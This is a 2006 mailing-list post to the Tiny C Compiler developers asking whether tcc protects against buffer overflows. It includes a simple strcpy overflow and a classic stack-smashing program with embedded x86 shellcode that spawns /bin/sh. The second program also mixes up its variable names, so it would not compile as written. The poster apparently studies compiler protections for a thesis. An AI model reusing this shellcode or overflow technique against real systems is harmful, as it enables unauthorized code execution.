[Top][All Lists]
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Tinycc-devel] Buffer overflow protection ?
|
From: |
Xushi |
|
Subject: |
[Tinycc-devel] Buffer overflow protection ? |
|
Date: |
Mon, 11 Dec 2006 19:34:23 +0000 |
|
User-agent: |
KMail/1.9.5 |
Hi All.
I'm new to tcc, and i like it so far, nice and small.
Does tcc have any protection against buffer overflows ? I've done some basic
testing and got weird results.
Two programs, the first one is a simple overflow. It segfaults in tcc 0.9.23
(doesn't in gcc 4.1).
===========================
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
void overflow(void) {
char buff[5];
strcpy(buff, "0123456");
}
int main(void) {
printf("overflow\n");
overflow();
return EXIT_SUCCESS;
}
============================
The second one has a shell (in hex to pass it overflowing the RET address),
copying , to my interest, segfaults in gcc 4.1, but it works in tcc, giving
me access to a shell.
=============================
char shellCode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
char largeString[128];
void main() {
char buffer[96];
int i;
long *long_ptr = (long *) largeString;
for (i = 0; i < 32; i++)
*(long_ptr + i) = (int) buffer;
for (i = 0; i < strlen(shellcode); i++)
large_string[i] = shellcode[i];
strcpy(buffer,large_string);
}
=============================
Don't get me wrong, i'm not complaining at all, I'm using tcc for my thesis
because of the ability to do this (very exciting too). I just wonder, does
tcc have protection ?
Thanks,
Sam.
--
Xushi
><ushi.co.uk
- [Tinycc-devel] Buffer overflow protection ?,
Xushi <=